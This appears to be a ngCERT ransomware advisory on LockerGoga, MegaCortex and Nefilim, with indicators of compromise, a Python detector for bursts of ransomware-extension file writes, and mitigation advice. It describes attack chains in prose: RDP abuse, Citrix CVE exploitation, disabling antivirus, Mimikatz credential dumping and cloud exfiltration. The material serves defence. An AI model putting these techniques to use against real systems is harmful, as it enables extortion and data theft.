LockerGoga targeted industrial organisations; it encrypts files with the Advanced Encryption Standard (AES) and appends ".locked" to them. Initial access was achieved through phishing or stolen Remote Desktop Protocol (RDP) credentials. The malware is dropped into the %TEMP% folder, disables network interfaces, runs cipher.exe to wipe free disk space, encrypts files and demands payment by email. MegaCortex is a hybrid ransomware used against enterprises and carries anti-analysis features. Its attack chain involves initial access through phishing, SQL injection or exposed RDP, followed by Cobalt Strike for persistence, a kill.bat script that stops security software to evade antivirus detection, propagation alongside Qakbot infections, and multi-million-dollar ransom demands. Nefilim practises double extortion: it encrypts files with AES-128 and protects the AES key with RSA-2048 (Rivest-Shamir-Adleman, a public-key cryptosystem), appending ".NEFILIM" or ".DERZKO" to files. Its operators exploit CVE-2019-19781 (a critical directory traversal vulnerability in Citrix Application Delivery Controller (ADC) and Gateway that allows unauthenticated remote code execution) as well as exposed RDP and phishing for initial access. Mimikatz is then used for credential dumping and PsExec/WMI for lateral movement, privilege escalation and persistence, before data is exfiltrated to cloud storage such as MEGAsync and the criminals threaten to leak it.
INDICATORS OF COMPROMISE
The following are observed Indicators of Compromise (IoCs):
1. LockerGoga: sample SHA-256 hashes published in Fortinet and Unit 42 reports; execution from %TEMP%, use of cipher.exe, ".locked" file extensions; email-based ransom demands.
2. MegaCortex: sample hashes published in Heimdal reports; kill.bat, Cobalt Strike beacons, RDP (TCP 3389) activity; Qakbot-related traffic.
3. Nefilim: Delphi-compiled samples; Mimikatz credential dumps, PsExec/WMI usage, MEGAsync exfiltration traffic; connections to known exfiltration domains; CVE-2019-19781 exploit attempts against Citrix ADC/Gateway.
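The file-extension indicators above lend themselves to a simple burst detector. The Python below is an added example (not from the advisory or the cited reports): it walks file-create events in time order, such as Sysmon FileCreate (Event ID 11) or Windows object-access audit records, and raises an alert the first time a single process writes at least five files with a ransomware extension within ten seconds, which separates an encryptor from a process that touches one such file in passing. The event stream is constructed; the extensions are the ones named above and should be extended with whatever your own incident data shows.

```python
import ntpath
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Extensions named in this advisory; extend with others seen in your environment.
RANSOM_EXTS = {".locked", ".nefilim", ".derzko"}


def detect_bursts(events, window=timedelta(seconds=10), threshold=5):
    """events: (timestamp, process, path) tuples in time order, e.g. from Sysmon
    FileCreate (Event ID 11) or Windows object-access auditing.

    Returns (process, window_start, count) once per process, the first time it writes
    at least `threshold` ransomware-extension files within `window`.
    """
    recent = defaultdict(deque)   # per process: timestamps of recent suspicious writes
    alerted = set()
    alerts = []
    for ts, proc, path in events:
        if ntpath.splitext(path)[1].lower() not in RANSOM_EXTS:
            continue
        q = recent[proc]
        q.append(ts)
        while q and ts - q[0] > window:   # drop writes that fell out of the window
            q.popleft()
        if len(q) >= threshold and proc not in alerted:
            alerted.add(proc)
            alerts.append((proc, q[0], len(q)))
    return alerts


# Constructed event stream (timestamps, hosts and names are made up)
BASE = datetime(2025, 10, 1, 2, 14, 0)
ENCRYPTOR = r"C:\Users\bob\AppData\Local\Temp\svc.exe"
SLOW = r"C:\Tools\slowtool.exe"
SAMPLE_EVENTS = [
    (BASE, r"C:\Windows\explorer.exe", r"C:\Users\bob\Documents\q3-report.docx"),
    (BASE + timedelta(seconds=1.0), ENCRYPTOR, r"C:\Shares\finance\budget.xlsx.locked"),
    (BASE + timedelta(seconds=1.4), ENCRYPTOR, r"C:\Shares\finance\invoice.pdf.locked"),
    (BASE + timedelta(seconds=1.9), ENCRYPTOR, r"C:\Shares\finance\payroll.csv.locked"),
    (BASE + timedelta(seconds=2.3), ENCRYPTOR, r"C:\Shares\finance\contracts.docx.locked"),
    (BASE + timedelta(seconds=2.8), ENCRYPTOR, r"C:\Shares\finance\forecast.pptx.locked"),
    (BASE + timedelta(seconds=3.1), ENCRYPTOR, r"C:\Shares\finance\notes.txt.locked"),
    (BASE + timedelta(seconds=5), SLOW, r"C:\Tools\out\a.NEFILIM"),
    (BASE + timedelta(seconds=40), SLOW, r"C:\Tools\out\b.NEFILIM"),
    (BASE + timedelta(seconds=80), SLOW, r"C:\Tools\out\c.NEFILIM"),
]

if __name__ == "__main__":
    for proc, start, count in detect_bursts(SAMPLE_EVENTS):
        print(f"{start:%H:%M:%S} {proc}: {count} ransomware-extension writes within 10s")
```

The detector fires once, at the fifth ".locked" write by the Temp-resident executable, and stays quiet for the process that writes a ".NEFILIM" file every 35 to 40 seconds; lower the threshold or widen the window if your telemetry is sampled, and pair the alert with an automated network isolation of the host, since the encryptor will have already been running for seconds by the time it fires.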
CONSEQUENCES
Successful attacks by LockerGoga, MegaCortex or Nefilim could result in:
- Disruption of operations, supply chain interruptions and possible Denial of Service (DoS) attacks.
- Financial losses due to ransom payments, recovery costs and General Data Protection Regulation (GDPR) fines.
- Reputational damage due to data exposure from possible dark web leaks and the possibility of secondary extortion.
- National security risks occasioned by breaches to defence and sensitive critical infrastructure.
SOLUTION/MITIGATION
ngCERT recommends that organisations:
- Patch vulnerabilities such as CVE-2019-19781, do not expose RDP directly to the Internet, enforce multifactor authentication, and implement Zero Trust and least-privilege access to limit initial access.
- Deploy Endpoint Detection and Response (EDR) for behavioural monitoring such as process injection, lateral movement, credential dumping and cloud exfiltration.
- Maintain offline, immutable backups (3-2-1 rule); test recovery quarterly; avoid ransom payments and report to ngCERT in the event of an attack, to ensure speedy recovery.
- Block IoCs at firewalls.
- Conduct regular phishing awareness training for all staff.
HYPERLINK